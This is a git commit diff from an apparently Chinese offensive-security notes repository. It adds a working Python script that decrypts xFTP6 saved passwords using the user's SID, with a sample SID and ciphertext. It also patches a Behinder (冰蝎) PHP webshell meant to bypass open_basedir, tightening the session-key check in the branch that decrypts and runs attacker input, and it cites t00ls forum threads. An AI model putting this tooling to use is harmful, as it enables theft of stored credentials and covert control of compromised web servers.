add xFTP6密码解密.md&fix 冰蝎bypass_open_basedir_shell

2025-08-12 19:16:25 +00:00 · 2020-05-10 00:20:03 +08:00 · 2020-05-10 00:20:03 +08:00 · fd88c5af85
commit fd88c5af85
parent 91c916e8df
2 changed files with 21 additions and 2 deletions
--- a/tools/xFTP6密码解密.md
+++ b/tools/xFTP6密码解密.md
@ -0,0 +1,17 @@
+### xFTP6密码解密
+
+```python
+from base64 import b64encode, b64decode
+from Crypto.Hash import MD5, SHA256
+from Crypto.Cipher import ARC4
+
+UserSid = "RcoIlS-1-5-21-3990929841-153547143-3340509336-1001"
+rawPass = "klSqckgTSU0TfhYxu6MB1ayrbnu3qnTOEYXUVlZe9R1zdney"
+data = b64decode(rawPass)
+Cipher = ARC4.new(SHA256.new((UserSid).encode()).digest())
+ciphertext, checksum = data[:-SHA256.digest_size], data[-SHA256.digest_size:]
+plaintext = Cipher.decrypt(ciphertext)
+print plaintext.decode()
+```
+
+上面就是解密代码,需要自行安装需要的库，使用python2运行或者修改print()在python3环境下使用.
--- a/tools/冰蝎bypass_open_basedir_shell.md
+++ b/tools/冰蝎bypass_open_basedir_shell.md
@ -45,7 +45,7 @@ if (isset($_GET['pass']))
    $_SESSION['k']=$key;
    print $key;
 }
-else
+else if (!empty($_SESSION['k']))
 {
    $key=$_SESSION['k'];
        $post=file_get_contents("php://input").'';
@ -71,6 +71,8 @@ else

 ```

-### 原帖：https://www.t00ls.net/thread-56301-1-1.html
+### 原帖：https://www.t00ls.net/thread-56301-1-1.html 
+
+### 参考：https://www.t00ls.net/thread-56337-1-1.html

 ### 欢迎大家前往土司投稿！